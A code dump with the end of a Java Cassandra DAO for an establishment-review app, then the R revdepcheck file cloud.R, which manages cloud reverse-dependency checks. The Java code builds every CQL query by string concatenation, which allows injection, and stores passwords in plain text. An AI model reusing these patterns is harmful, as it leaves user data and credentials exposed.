                + "estabelecimento_descricao TEXT,"
                + "avaliacao DOUBLE,"
                + "latitude DOUBLE,"
                + "longitude DOUBLE, PRIMARY KEY (estabelecimento_id));";
        // Q2: What are the user's registration details?
        String q2="CREATE TABLE if not exists usuario "
                + "(cpf TEXT,"
                + "usuario_nome TEXT,"
                + "senha TEXT,"
                + "email TEXT,"
                + "PRIMARY KEY (cpf));";
        // Q3: All reviews for a given establishment, with score and reviewer.
        String q3="CREATE TABLE if not exists avaliacao "
                + "(estabelecimento_id UUID,"// partition key so all reviews of one establishment live together
                + "avaliacao_id UUID,"
                + "estabelecimento_nome TEXT,"
                + "estabelecimento_descricao TEXT,"
                + "usuario_nome TEXT,"
                + "avaliacao DOUBLE,"
                + "PRIMARY KEY (estabelecimento_id,avaliacao_id));";
        //+ "WITH CLUSTERING ORDER BY (usuario_nome ASC);";
        // Q3 v2 (unused alternative): reviews stored as a list of (name, score) tuples.
        @SuppressWarnings("unused")
        String q3_2="CREATE TABLE if not exists avaliacao "
                + "(estabelecimento_id UUID,"
                + "estabelecimento_nome TEXT,"
                + "estabelecimento_descricao TEXT,"
                + "avaliacao list<frozen<tuple<TEXT,DOUBLE>>>,"
                + "PRIMARY KEY (estabelecimento_id));";
        //+ "WITH CLUSTERING ORDER BY (estabelecimento_nome ASC);";
        // Q4: Which questions does an establishment ask the user?
        String q4="CREATE TABLE if not exists tipoAvaliacao"
                + "(estabelecimento_id UUID,"
                //+ "tipo INT,"
                + "estabelecimento_descricao TEXT,"
                + "avaliacao_descricao LIST<TEXT>,"
                + "PRIMARY KEY (estabelecimento_id));";
        //+ "WITH CLUSTERING ORDER BY (tipo ASC);";
        //String idx1="CREATE INDEX if not exists avl_index on avaliacao(avaliacao_id)";
        String idx1="CREATE CUSTOM INDEX if not exists avaliacao_index ON avaliacao (avaliacao_id) USING 'org.apache.cassandra.index.sasi.SASIIndex'";
        @SuppressWarnings("unused")
        String idx1_2="CREATE CUSTOM INDEX if not exists avaliacao_index ON avaliacao (avaliacao) USING 'org.apache.cassandra.index.sasi.SASIIndex'";
        String idx2="CREATE CUSTOM INDEX if not exists usuario_index on usuario(usuario_nome) USING 'org.apache.cassandra.index.sasi.SASIIndex'";
        //String idx3="CREATE CUSTOM INDEX if not exists estabelecimento_index on estabelecimento(estabelecimento_id) USING 'org.apache.cassandra.index.sasi.SASIIndex'";
        //String idx3="";
        //String idx4="";
        cluster = Cluster.builder().addContactPoint(url).build();
        //Cluster.builder().addContactPoint("192.168.0.100");
        //Cluster.builder().addContactPoint("192.168.0.102");
        //Cluster.builder().addContactPoint("172.16.31.10");
        session=cluster.newSession();
        session.execute(ks);
        session = cluster.connect(keyspace);
        // delete these 4 lines (left from development: full schema reset)
        /*session.execute("drop table estabelecimento;");
        session.execute("drop table usuario;");
        session.execute("drop table avaliacao;");
        session.execute("drop table tipoavaliacao;");*/
        session.execute(q1);
        session.execute(q2);
        session.execute(q3);
        session.execute(q4);
        session.execute(idx1);
        session.execute(idx2);
        //session.execute(idx3);
    }

    ///INSERT

    /** Inserts a new establishment with an initial average rating of 0.0. */
    public void inserirEstabelecimento(UUID estabelecimento_id, double latitude, double longitude, String estabelecimento_descricao, String estabelecimento_nome){
        session.execute("INSERT INTO estabelecimento ( estabelecimento_id,estabelecimento_descricao, estabelecimento_nome, avaliacao, latitude, longitude) VALUES ("
                +String.valueOf(estabelecimento_id)
                +", '"+estabelecimento_descricao
                +"', '"+estabelecimento_nome
                +"', 0.0"
                +", "+String.valueOf(latitude)
                +", "+String.valueOf(longitude)+")");
    }

    /**
     * Variant of {@link #inserirEstabelecimento} that also pre-creates an
     * empty review row for the establishment in the avaliacao table.
     */
    public void inserirEstabelecimento_2(UUID estabelecimento_id, double latitude, double longitude, String estabelecimento_descricao, String estabelecimento_nome){
        session.execute("INSERT INTO estabelecimento ( estabelecimento_id,estabelecimento_descricao, estabelecimento_nome, avaliacao, latitude, longitude) VALUES ("
                +String.valueOf(estabelecimento_id)
                +", '"+estabelecimento_descricao
                +"', '"+estabelecimento_nome
                +"', 0.0"
                +", "+String.valueOf(latitude)
                +", "+String.valueOf(longitude)+")");
        // Pre-create an empty review record for this establishment.
        session.execute("INSERT INTO avaliacao( estabelecimento_id, estabelecimento_nome,estabelecimento_descricao,avaliacao) VALUES ("
                +String.valueOf(estabelecimento_id)
                +", '"+estabelecimento_nome
                +"', '"+estabelecimento_descricao
                +"', null)");
    }

    /** Registers a user keyed by CPF. NOTE(review): the password is stored in plain text. */
    public void inserirUsuario(String cpf, String senha, String nome, String email){
        session.execute("INSERT INTO usuario (cpf, senha, usuario_nome, email) VALUES ('"
                +cpf
                +"', '"+senha
                +"', '"+nome
                +"', '"+email+"')");
    }

    /** Inserts a fully-specified review row (all columns supplied by the caller). */
    public void inserirAvaliacao(UUID estabelecimento_id,UUID avaliacao_id,String estabelecimento_nome, String estabelecimento_descricao,String usuario_nome,double valor){
        session.execute("INSERT INTO avaliacao( estabelecimento_id, avaliacao_id,estabelecimento_nome,estabelecimento_descricao, usuario_nome,avaliacao) VALUES ("
                +String.valueOf(estabelecimento_id)
                +","+String.valueOf(avaliacao_id)
                +", '"+estabelecimento_nome
                +"', '"+estabelecimento_descricao
                +"', '"+usuario_nome
                +"', "+String.valueOf(valor)+")");
    }

    /**
     * Convenience overload: looks up the establishment's name/description
     * first, then inserts the review asynchronously.
     * NOTE(review): no avaliacao_id is supplied here — confirm how the
     * clustering key is filled for rows written by this overload.
     */
    public void inserirAvaliacao(UUID estabelecimento_id,String usuario_nome,double valor){
        Estabelecimento e=buscarEstabelecimento(estabelecimento_id);
        session.executeAsync("INSERT INTO avaliacao( estabelecimento_id, estabelecimento_nome,estabelecimento_descricao, usuario_nome,avaliacao) VALUES ("
                +String.valueOf(estabelecimento_id)
                +", '"+e.getNome()
                +"', '"+e.getDescricao()
                +"', '"+usuario_nome
                +"', "+String.valueOf(valor)+")");
    }

    /**
     * Alternative for the q3_2 schema: appends a (user, score) tuple to the
     * review list. Maybe one record per review would perform better.
     */
    public void inserirAvaliacao_2(UUID estabelecimento_id,String usuario_nome,double valor){
        //if(buscarAvaliacao(estabelecimento_id)!=null){
        session.execute("UPDATE avaliacao SET avaliacao = avaliacao + [('"+usuario_nome+"',"+String.valueOf(valor)+")] "
                +" WHERE estabelecimento_id = "+String.valueOf(estabelecimento_id));
        //+" AND estabelecimento_nome = '"+estabelecimento_nome+"'";
        //}
    }

    /**
     * Adds a question to an establishment's questionnaire: appends to the
     * existing list when the row exists, otherwise inserts a fresh row.
     */
    public void inserirTipoAvaliacao(UUID estabelecimento_id, String estabelecimento_descricao, String avaliacao_descricao){
        if(buscarTipoAvaliacao(estabelecimento_id))
            session.execute("UPDATE tipoAvaliacao SET avaliacao_descricao = avaliacao_descricao + ['"+avaliacao_descricao+"'] "
                    +" WHERE estabelecimento_id = "+String.valueOf(estabelecimento_id));
            //+" AND tipo ="+tipo);
        else
            session.execute("INSERT INTO tipoAvaliacao (estabelecimento_id, estabelecimento_descricao, avaliacao_descricao) VALUES ("
                    +String.valueOf(estabelecimento_id)
                    //+", "+String.valueOf(tipo)
                    +", '"+estabelecimento_descricao
                    +"', ['"+avaliacao_descricao+"'])");
    }

    //SELECT

    /**
     * Looks up one establishment by id.
     *
     * @return the first matching row mapped to an Estabelecimento, or null
     *         when no row matches
     */
    public Estabelecimento buscarEstabelecimento(UUID estabelecimento_id){
        ResultSet result= session.execute("SELECT estabelecimento_id, latitude, longitude,estabelecimento_descricao, estabelecimento_nome FROM estabelecimento "
                + "WHERE estabelecimento_id="+String.valueOf(estabelecimento_id)+";");
        for (Row row : result) {
            // Debug dump of the matched row.
            System.out.format("%s %e %e %s %s\n", row.getUUID("estabelecimento_id"), row.getDouble("latitude"), row.getDouble("longitude"), row.getString("estabelecimento_descricao"), row.getString("estabelecimento_nome"));
            Estabelecimento e= new Estabelecimento();
            e.setId(row.getUUID("estabelecimento_id"));
            e.setLatitude(row.getDouble("latitude"));
            e.setLongitude(row.getDouble("longitude"));
            e.setNome(row.getString("estabelecimento_nome"));
            e.setDescricao(row.getString("estabelecimento_descricao"));
            return e;
        }
        return null;
    }

    /** Prints the registration details of the user with the given CPF. */
    public void buscarUsuario(String cpf){
        ResultSet results = session.execute("SELECT cpf, senha, usuario_nome, email FROM usuario "
                + "WHERE cpf='"+cpf+"';");
        for (Row row : results) {
            // NOTE(review): the column is selected as "usuario_nome" but read
            // here as "nome" — this likely throws at runtime; confirm.
            System.out.format("%s %s %s %s\n", row.getString("cpf"), row.getString("senha"), row.getString("nome"), row.getString("email"));
        }
    }

    /**
     * Returns every review of one establishment.
     *
     * @return possibly-empty list of Avaliacao rows
     */
    public List<Avaliacao> buscarAvaliacao(UUID estabelecimento_id){
        ResultSet results = session.execute("SELECT * FROM avaliacao where estabelecimento_id="+estabelecimento_id+";");
        List<Avaliacao> L_av=new ArrayList<Avaliacao>();
        Avaliacao av=null;
        for (Row row : results) {
            /*String estabelecimento_nome;
            String estabelecimento_descricao;
            String usuario_nome;
            double nota;
            estabelecimento_nome=row.getString("estabelecimento_nome");
            estabelecimento_descricao=row.getString("estabelecimento_descricao");
            usuario_nome=row.getString("usuario_nome");
            nota=row.getDouble("avaliacao");*/
            av= new Avaliacao(estabelecimento_id,row.getUUID("avaliacao_id"),row.getString("estabelecimento_nome"),row.getString("estabelecimento_descricao"),row.getString("usuario_nome"),row.getDouble("avaliacao"));
            L_av.add(av);
        }
        return L_av;
    }

    /**
     * Variant reader for the q3_2 tuple-list schema: returns the first
     * (user, score) pair of the review list.
     * NOTE(review): the WHERE clause uses "id" but the table's key column is
     * "estabelecimento_id" — confirm against the active schema.
     */
    public Tupla<String, Double> buscarAvaliacao2(UUID estabelecimento_id){
        ResultSet results = session.execute("SELECT avaliacao FROM avaliacao "
                + "WHERE id="+estabelecimento_id+";");
        Tupla<String, Double> t=null;
        for (Row row : results) {
            String nome;
            double avaliacao;
            t= new Tupla<String, Double>();
            List<TupleValue> tuplas=row.getList("avaliacao",new TypeToken<TupleValue>(){
                private static final long serialVersionUID = 1L;});
            nome=tuplas.get(0).getString(0);
            avaliacao=tuplas.get(0).getDouble(1);
            t.put(nome, avaliacao);
            //tuplas.remove(0);
            //System.out.format("% %s\n", row.getMap("avaliacao", String.class, double.class));
        }
        return t;
    }

    /**
     * Checks whether a questionnaire row exists for the establishment.
     *
     * @return true when at least one row matches
     */
    public boolean buscarTipoAvaliacao(UUID estabelecimento_id){
        ResultSet results = session.execute("SELECT estabelecimento_descricao,avaliacao_descricao FROM tipoAvaliacao "
                + "WHERE estabelecimento_id="+estabelecimento_id+";");
        boolean has=false;
        for (@SuppressWarnings("unused") Row row : results) {
            has=true;
            // System.out.format("%s %s\n", row.getString("estabelecimento_descricao"), row.getList("avaliacao_descricao",String.class));
        }
        return has;
    }

    //delete

    //update
}
| 738b30225f2a9aa7f99c544c87fab4dbd2ec9b22 | [
"Markdown",
"Java"
] | 5 | Java | matheus0392/BDG_Cassandra | 26fdb28ee5cd26f74eef28df14bfbd70a8282e0d | c5daa91076b4a14a08b58c03d61436ed9db986a4 |
refs/heads/main | <repo_name>cderv/revdepcheck<file_sep>/R/cloud.R
#' Monitor the status of a cloud job
#'
#' The format of the status bar is
#' `[jobs_queued/jobs_running/jobs_succeeded/jobs_failed - total_jobs] time_elapsed | ETA: estimate_time_remaining`
#'
#' @param update_interval The number of seconds between querying for updates
#' @family cloud
#' @importFrom cli cli_format cli_status_update col_green col_blue col_red
#' style_bold cli_status_clear cli_status cli_alert
#' @inheritParams cloud_report
#' @export
cloud_status <- function(job_name = cloud_job(), update_interval = 10) {
  # Open a cli status line that is redrawn in place on every poll.
  status_id <- cli_status("Status of {.val {job_name}}")

  info <- cloud_job_info(job_name)
  # Timestamps from the API are ISO 8601, interpreted as UTC.
  started_time <- as.POSIXct(info$started_timestamp, tz = "UTC", format="%Y-%m-%dT%H:%M:%OS")

  # One polling step. Returns TRUE when all checks succeeded, FALSE as soon as
  # any package check failed, and NA while the job is still in progress.
  cloud_status_check <- function(job_name) {
    status <- cloud_job_status(job_name)
    if (length(status) == 0) {
      # NOTE(review): the message is missing its closing quote.
      stop("No job with Id: '", job_name, call. = FALSE)
    }
    size <- status$size
    results <- unlist(status$statusSummary)
    # The summary is not integer-populated until AWS Batch registers the jobs.
    if (!is.integer(results)) {
      return(NA)
    }
    names(results) <- tolower(names(results))
    results <- results[c("pending", "runnable", "starting", "running", "succeeded", "failed")]
    num_completed <- sum(results[c("succeeded", "failed")])
    num_queued <- sum(results[c("pending", "runnable")])
    num_running <- sum(results[c("starting", "running")])

    current_time <- Sys.time()
    elapsed <- hms::as_hms(as.integer(difftime(current_time, started_time, units = "secs")))
    eta <- calc_eta(started_time, current_time, num_running, num_completed, size)

    # Format: [queued/running/succeeded/failed - total] elapsed | ETA
    status_bar_text <- "[{num_queued}/{col_blue(num_running)}/{col_green(results[['succeeded']])}/{col_red(results[['failed']])} - {.strong {size}}] {elapsed} | ETA: {eta}"

    # Any failed package check terminates monitoring immediately.
    if (results[["failed"]] > 0) {
      cli_status_clear(id = status_id, result = "failed", msg_failed = paste0("{.emph FAILED}: ", status_bar_text))
      cli_alert("run {.fun cloud_summary} for interactive results")
      cli_alert("run {.fun cloud_report} for markdown reports")
      return(FALSE)
    }

    # Every revdep finished and none failed: done.
    if (num_completed == length(info$revdep_packages)) {
      cli_status_clear(id = status_id, result = "done", msg_done = paste0("{.emph SUCCEEDED}: ", status_bar_text))
      cli_alert("run {.fun cloud_summary} for interactive results")
      cli_alert("run {.fun cloud_report} for markdown reports")
      return(TRUE)
    }

    cli::cli_status_update(id = status_id, status_bar_text)
    return(NA)
  }

  # Poll until the job reaches a terminal state (TRUE or FALSE).
  while(is.na(res <- cloud_status_check(job_name))) {
    Sys.sleep(update_interval)
  }
  return(invisible(res))
}
# Estimate time remaining for a batch job from its throughput so far.
#
# Returns "Done" once every package has completed, the infinity symbol when no
# estimate is possible (nothing running yet, or no completed packages to
# extrapolate from), otherwise a human-readable duration string.
calc_eta <- function(creation_time, current_time, running, completed, total) {
  if (completed >= total) {
    return("Done")
  }

  infinity <- "\U221E"
  if (running == 0) {
    return(infinity)
  }

  time_diff <- as.integer(difftime(current_time, creation_time, units = "secs"))
  to_go <- total - completed

  # Extrapolate: average seconds per completed package times packages left.
  secs_to_go <- time_diff / completed * to_go

  # completed == 0 yields Inf (or NaN when time_diff is also 0). The previous
  # `secs_to_go == Inf` test evaluated to NA for NaN and crashed the `if`;
  # is.finite() handles both cases.
  if (!is.finite(secs_to_go)) {
    return(infinity)
  }

  prettyunits::pretty_sec(secs_to_go)
}
#' Fetch results from the cloud
#'
#' Intended mainly for internal and expert use. This function when needed by
#' [cloud_report()] and `[cloud_summary()]`, so it is unlikely you will need to
#' call it explicitly.
#'
#' @keywords internal
#' @family cloud
#' @inheritParams cloud_report
#' @importFrom curl new_handle handle_setheaders new_pool multi_add multi_run handle_setopt
#' @importFrom cli cli_progress_bar cli_progress_update cli_progress_done pb_percent
#' @export
cloud_fetch_results <- function(job_name = cloud_job(pkg = pkg), pkg = ".") {
pkg <- pkg_check(pkg)
cloud <- dir_find(pkg, "cloud")
info <- cloud_job_info(job_name)
out_dir <- file.path(cloud, job_name)
dir.create(out_dir, showWarnings = FALSE, recursive = TRUE, mode = "0744")
rel_out_dir <- sub(paste0(pkg_check(pkg), "/"), "", out_dir, fixed = TRUE)
cli_alert_info("Syncing results to {.file {rel_out_dir}}")
packages <- info$revdep_packages
out_files <- file.path(out_dir, paste0(packages, ".tar.gz"))
to_download <- !file.exists(out_files)
pb <- cli_progress_bar(format = "Downloading package results: {pb_percent}", total = sum(to_download))
handle_success <- function(res) {
if (res$status_code >= 400) {
out_file <- sprintf("%s/%s.tar.gz", out_dir, basename(dirname(res$url)))
unlink(out_file)
}
cli_progress_update(id = pb)
}
pool <- new_pool()
for (i in which(to_download)) {
out_file <- out_files[[i]]
package <- packages[[i]]
url <- sprintf("https://xgyefaepu5.execute-api.us-east-1.amazonaws.com/staging/check/%s/packages/%s/results.tar.gz", job_name, package)
handle <- new_handle()
handle_setopt(handle, url = enc2utf8(url))
handle_setheaders(handle, "x-api-key" = Sys.getenv("RSTUDIO_CLOUD_REVDEP_KEY"), Accept = "application/x-gzip")
multi_add(handle = handle, done = handle_success, pool = pool, data = out_file)
}
out <- multi_run(pool = pool)
cli_progress_done(id = pb)
to_extract <- file.exists(out_files) & !dir.exists(file.path(out_dir, packages))
pb2 <- cli_progress_bar(format = "Extracting package results: {pb_percent}", total = sum(to_extract))
for (i in which(to_extract)) {
out_file <- out_files[[i]]
utils::untar(out_file, exdir = out_dir)
cli_progress_update(id = pb2)
}
cli_progress_done(id = pb2)
}
#' Submit a reverse dependency checking job to the cloud
#'
#' @param tarball A pre-built package tarball, if `NULL` a tarball will be
#' automatically built for the package at `pkg` by [pkgbuild::build()].
#' @param revdep_packages A character vector of packages to check, if `NULL`
#' equal to [cran_revdeps()]
#' @param r_version The R version to use.
#' @returns The AWS Batch job-id
#' @inheritParams revdep_check
#' @importFrom cli cli_alert_info cli_alert_success cli_alert_danger
#' @importFrom httr GET PATCH POST stop_for_status add_headers content
#' @family cloud
#' @export
cloud_check <- function(pkg = ".", tarball = NULL, revdep_packages = NULL, r_version = "4.0.3") {
if (is.null(tarball)) {
pkg <- pkg_check(pkg)
tarball <- pkgbuild::build(path = pkg)
}
package_name <- desc::desc_get_field("Package", file = tarball)
package_version <- as.character(desc::desc_get_version(file = tarball))
# Lookup revdeps with R, as the RSPM db seems not quite right, for instance
# it seems to include archived packages.
if (is.null(revdep_packages)) {
revdep_packages <- setdiff(cran_revdeps(package_name), package_name)
}
post_response <- POST("https://xgyefaepu5.execute-api.us-east-1.amazonaws.com/staging/check",
config = add_headers("x-api-key" = Sys.getenv("RSTUDIO_CLOUD_REVDEP_KEY")),
body = list(
package_name = package_name,
package_version = package_version,
revdep_packages = revdep_packages,
r_version = r_version
),
encode = "json"
)
cloud_stop_for_status(post_response)
post_content <- content(post_response)
presigned_url <- post_content[["_source_presigned_url"]]
job_name <- post_content[["id"]]
cli_alert_success("Creating cloud job {.arg job_name}: {.val {job_name}}")
cli_alert_info("Uploading {.file {tarball}}")
curl::curl_upload(tarball, presigned_url, verbose = FALSE)
cli_alert_success("Uploaded {.file {tarball}}")
cli_alert_info("Spawning batch job for cloud job {.arg job_name}: {.val {job_name}}")
patch_response <- PATCH("https://xgyefaepu5.execute-api.us-east-1.amazonaws.com",
config = add_headers("x-api-key" = Sys.getenv("RSTUDIO_CLOUD_REVDEP_KEY")),
path = paste0("staging/check", "/", job_name),
body = list(status = "running"),
encode = "json"
)
cloud_stop_for_status(patch_response)
patch_content <- content(patch_response)
job_name <- patch_content$id
cli_alert_success("Created job {.arg job_name}: {.val {job_name}}")
cli_alert("Run {.fun cloud_status} to monitor job status")
cloud_job(job_name = job_name)
cloud <- dir_find(pkg, "cloud")
out_dir <- file.path(cloud, job_name)
dir.create(out_dir, showWarnings = FALSE, recursive = TRUE, mode = "744")
cloud_job(job_name)
invisible(job_name)
}
#' Cancel a running cloud run
#'
#' @inheritParams cloud_report
#' @family cloud
#' @export
cloud_cancel <- function(job_name = cloud_job()) {
  # Ask the revdep cloud API to flip this job's status to "cancelled".
  response <- PATCH(
    "https://xgyefaepu5.execute-api.us-east-1.amazonaws.com",
    config = add_headers("x-api-key" = Sys.getenv("RSTUDIO_CLOUD_REVDEP_KEY")),
    path = paste0("staging/check", "/", job_name),
    body = list(status = "cancelled"),
    encode = "json"
  )
  # Raise a classed error if the API rejected the request.
  cloud_stop_for_status(response)
}
#' @importFrom httr status_code content headers http_status
# Convert an HTTP error response from the cloud API into a classed R error.
#
# Responses with status < 300 are treated as success and return invisibly.
# Otherwise a condition of class c("cloud_error", "http_error_<status>",
# "error", "condition") is signalled, carrying the HTTP reason and the API's
# `invalid_values`/`message` payload. Fix: the previous version computed
# unused locals (`heads`, `call`); they are removed here.
cloud_stop_for_status <- function(response) {
  status <- status_code(response)
  if (status < 300) {
    return()
  }

  res <- content(response)

  msg <- c(
    paste0("Cloud error (", status, "): ", http_status(status)$reason),
    paste0("Message: ", res$invalid_values %||% res$message)
  )

  cond <- structure(list(
    message = paste0(msg, collapse = "\n")
  ),
  class = c(
    "cloud_error",
    paste0("http_error_", status),
    "error",
    "condition"
  ))
  stop(cond)
}
cloud_check_result <- function(check_log, description, dependency_error) {
  # Parse one 00check.log into an "rcmdcheck"-classed list, mirroring the
  # structure rcmdcheck itself produces.
  check_dir <- dirname(check_log)

  # Missing log: the check never ran (e.g. dependency install failed). Return
  # a placeholder object with status -1 and NA check summaries.
  if (!file.exists(check_log)) {
    return(structure(
      list(
        stdout = character(),
        timeout = FALSE,
        status = -1L,
        rversion = NA_character_,
        platform = NA_character_,
        errors = NA_character_,
        warnings = NA_character_,
        notes = NA_character_,
        description = description$str(normalize = FALSE),
        package = description$get("Package"),
        version = description$get("Version")[[1]],
        cran = description$get_field("Repository", "") == "CRAN",
        bioc = description$has_fields("biocViews"),
        checkdir = check_dir,
        test_fail = rcmdcheck:::get_test_fail(check_dir),
        install_out = rcmdcheck:::get_install_out(check_dir),
        type = "cloud"
      ),
      class = "rcmdcheck"
    )
    )
  }

  stdout <- brio::read_file(check_log)

  # Fix invalid characters
  stdout <- iconv(stdout, "UTF-8", "UTF-8", sub = "bytes")

  # Strip \r
  stdout <- gsub("\r\n", "\n", stdout, fixed = TRUE)

  # Split the log into its "* checking ..." sections; drop the leading chunk.
  entries <- strsplit(paste0("\n", stdout), "\n\\*+[ ]")[[1]][-1]
  # Helper: discard the trailing DONE entry from a set of matches.
  notdone <- function(x) grep("^DONE", x, invert = TRUE, value = TRUE)

  res <- structure(
    list(
      stdout = stdout,
      timeout = FALSE,
      # Dependency failures are surfaced as status -1, otherwise 0.
      status = if (isTRUE(dependency_error)) -1L else 0L,
      rversion = rcmdcheck:::parse_rversion(entries),
      platform = rcmdcheck:::parse_platform(entries),
      errors = notdone(grep("ERROR\n", entries, value = TRUE)),
      warnings = notdone(grep("WARNING\n", entries, value = TRUE)),
      notes = notdone(grep("NOTE\n", entries, value = TRUE)),
      description = description$str(normalize = FALSE),
      package = description$get("Package"),
      version = description$get("Version")[[1]],
      cran = description$get_field("Repository", "") == "CRAN",
      bioc = description$has_fields("biocViews"),
      checkdir = check_dir,
      test_fail = rcmdcheck:::get_test_fail(check_dir),
      install_out = rcmdcheck:::get_install_out(check_dir),
      type = "cloud"
    ),
    class = "rcmdcheck"
  )

  res
}
cloud_compare <- function(pkg) {
  # Compare old vs. new check results inside one revdep result directory.
  description <- desc::desc(file = file.path(pkg, "DESCRIPTION"))

  old_log <- file.path(pkg, "old", paste0(basename(pkg), ".Rcheck"), "00check.log")
  new_log <- file.path(pkg, "new", paste0(basename(pkg), ".Rcheck"), "00check.log")

  # A dependency failure is flagged either by an explicit message in the
  # install log or by a missing check log on either side.
  dep_lines <- readLines(file.path(pkg, "dependency_install.log"), warn = FALSE)
  dependency_error <-
    any(grepl("ERROR: .*is not available for package", dep_lines)) ||
    !(file.exists(old_log) && file.exists(new_log))

  old <- cloud_check_result(old_log, description, dependency_error)
  new <- cloud_check_result(new_log, description, dependency_error)

  if (isTRUE(dependency_error)) {
    res <- rcmdcheck_error(description$get("Package"), old, new)
    res$version <- description$get("Version")[[1]]
    return(res)
  }

  rcmdcheck::compare_checks(old, new)
}
#' Display revdep results
#'
#' Shows a nicely formatted summary of the packages checked by a cloud run.
#' @inheritParams cloud_report
#' @family cloud
#' @export
cloud_summary <- function(job_name = cloud_job(pkg = pkg), pkg = ".") {
  # Fetch (downloading if necessary) and compare the check results, then tag
  # them so the revdepcheck print method renders the summary.
  res <- cloud_results(job_name = job_name, pkg = pkg)
  class(res) <- "revdepcheck_results"
  res
}
#' Display detailed revdep results from a cloud run
#'
#' @param revdep Name of the revdep package
#' @inheritParams cloud_report
#' @family cloud
#' @export
cloud_details <- function(job_name = cloud_job(pkg = pkg), revdep, pkg = ".") {
  pkg <- pkg_check(pkg)
  # Per-package results live under <cloud dir>/<job_name>/<revdep>/.
  revdep_dir <- file.path(dir_find(pkg, "cloud"), job_name, revdep)
  structure(cloud_compare(revdep_dir), class = "revdepcheck_details")
}
#' Markdown report of reverse dependency check results from the cloud
#'
#' You can use these functions to get intermediate reports of a running cloud check.
#' @inheritParams revdep_report_summary
#' @param results Results from [cloud_results()]. Expert use only.
#' @param job_name The job name, as returned by [cloud_check()].
#' @param failures Save failures to disk?
#' @inheritParams revdep_report
#' @family cloud
#' @export
cloud_report <- function(job_name = cloud_job(pkg = pkg), pkg = ".", file = "", all = FALSE, results = NULL, failures = TRUE) {
  pkg <- pkg_check(pkg)
  root <- dir_find(pkg, "root")
  # Only fetch from the cloud when the caller did not pass results explicitly.
  if (is.null(results)) {
    results <- cloud_results(job_name, pkg)
  }
  cli_alert_info("Generating reports")
  # Each sub-report is written to a fixed file under the revdep root.
  cli_alert_info("Writing summary to {.file revdep/README.md}")
  cloud_report_summary(file = file.path(root, "README.md"), all = all, results = results, pkg = pkg)
  cli_alert_info("Writing problems to {.file revdep/problems.md}")
  cloud_report_problems(file = file.path(root, "problems.md"), all = all, results = results, pkg = pkg)
  if (failures) {
    cli_alert_info("Writing failures to {.file revdep/failures.md}")
    cloud_report_failures(file = file.path(root, "failures.md"), results = results, pkg = pkg)
  } else {
    # Remove a stale failures report so the directory reflects this run.
    unlink(file.path(root, "failures.md"))
  }
  cli_alert_info("Writing CRAN comments to {.file cran.md}")
  revdep_report_cran(file = file.path(root, "cran.md"), results = results, pkg = pkg)
  invisible()
}
#' @rdname cloud_report
#' @export
cloud_report_summary <- function(job_name = cloud_job(pkg = pkg), file = "", all = FALSE, pkg = ".", results = NULL) {
  if (is.null(results)) {
    results <- cloud_results(job_name, pkg)
  }
  # When a file path (rather than a connection or "") is given, open it as a
  # UTF-8 connection and disable ANSI colouring; both are undone on exit.
  if (is_string(file) && !identical(file, "")) {
    file <- file(file, encoding = "UTF-8", open = "w")
    on.exit(close(file), add = TRUE)
    opts <- options("crayon.enabled" = FALSE)
    on.exit(options(opts), add = TRUE)
  }
  cat_header("Revdeps", file = file)
  revdeps <- report_revdeps(pkg = pkg, all = all, results = results)
  # Pull out the status / issue-count columns, then drop them from the table
  # that gets printed.
  status <- revdeps$status
  n_issues <- revdeps$issues
  revdeps$status <- revdeps$issues <- NULL
  # "+" and "-" are completed checks; anything else failed to check at all.
  failed <- !(status %in% c("+", "-"))
  broken <- status == "-"
  if (!all) {
    # In the condensed report, only show regressions with at least one issue.
    broken <- broken & n_issues > 0
  }
  revdep_report_section("Failed to check", revdeps[failed, ], file = file)
  revdep_report_section("New problems", revdeps[broken, ], file = file)
  if (all) revdep_report_section("All", revdeps, file = file)
  invisible()
}
#' @rdname cloud_report
#' @export
cloud_report_problems <- function(job_name = cloud_job(pkg = pkg), pkg = ".", file = "", all = FALSE, results = NULL) {
  # Fetch results from the cloud unless supplied, then delegate rendering to
  # the shared problems report.
  results <- results %||% cloud_results(job_name, pkg)
  revdep_report_problems(pkg = pkg, file = file, all = all, results = results)
}
#' @rdname cloud_report
#' @export
cloud_report_failures <- function(job_name = cloud_job(pkg = pkg), pkg = ".", file = "", results = NULL) {
  # Fetch results from the cloud unless supplied, then delegate rendering to
  # the shared failures report.
  results <- results %||% cloud_results(job_name, pkg)
  revdep_report_failures(pkg = pkg, file = file, results = results)
}
#' @rdname cloud_report
#' @export
cloud_report_cran <- function(job_name = cloud_job(pkg = pkg), pkg = ".", results = NULL) {
  # Fetch results from the cloud unless supplied, then delegate rendering to
  # the shared CRAN-comments report.
  results <- results %||% cloud_results(job_name, pkg)
  revdep_report_cran(pkg = pkg, results = results)
}
#' Retrieve cloud results
#'
#' Intended for expert use only, this can be used as input to the [cloud_report()] and other functions.
#' @inheritParams cloud_report
#' @family cloud
#' @keywords internal
#' @export
cloud_results <- function(job_name = cloud_job(pkg = pkg), pkg = ".") {
  pkg <- pkg_check(pkg)
  cloud <- dir_find(pkg, "cloud")
  # Download any results for this job that are not yet present locally.
  cloud_fetch_results(job_name, pkg = pkg)
  cli_alert_info("Comparing results")
  # One subdirectory per checked revdep under <cloud dir>/<job_name>/.
  pkgs <- list.dirs(file.path(cloud, job_name), full.names = TRUE, recursive = FALSE)
  pb <- cli_progress_bar(format = "Processing package results: {pb_percent} ({basename(pkg)})", total = length(pkgs))
  # Compare old vs new checks for every package, with progress feedback.
  out <- lapply(pkgs, function(pkg) {
    cli_progress_update(id = pb)
    cloud_compare(pkg)
  })
  cli_progress_done(id = pb)
  out
}
#' @inheritParams cloud_report
#' @inherit revdep_email
#' @export
cloud_email <- function(type = c("broken", "failed"), job_name = cloud_job(pkg = pkg), pkg = ".", packages = NULL, draft = FALSE) {
  type <- match.arg(type)
  package_results <- cloud_results(job_name, pkg)
  # Optionally restrict to an explicit set of package names.
  if (!is.null(packages)) {
    to_keep <- map_lgl(package_results, function(x) x$package %in% packages)
    package_results <- package_results[to_keep]
  }
  status <- map_chr(package_results, rcmdcheck_status)
  # Select results by rcmdcheck status code. NOTE(review): the "t"/"i"
  # prefixes presumably mark timeout / install outcomes and "-" a regression;
  # confirm against rcmdcheck_status().
  cond <- switch(type,
    broken = status %in% c("-", "t-", "i-"),
    failed = status %in% c("i+", "t+")
  )
  revdep_email_by_type(pkg, package_results[cond], type, draft = draft)
  invisible()
}
#' Return the current cloud job
#'
#' The `job_name` is automatically set by [cloud_check()] and is remembered for
#' the duration of the current R session. If there is no active `job_name`, but
#' there are local cloud check results, `job_name` is inferred from the most
#' recently modified cloud check results.
#'
#' @param job_name If not `NULL`, sets the active `job_name` to the input.
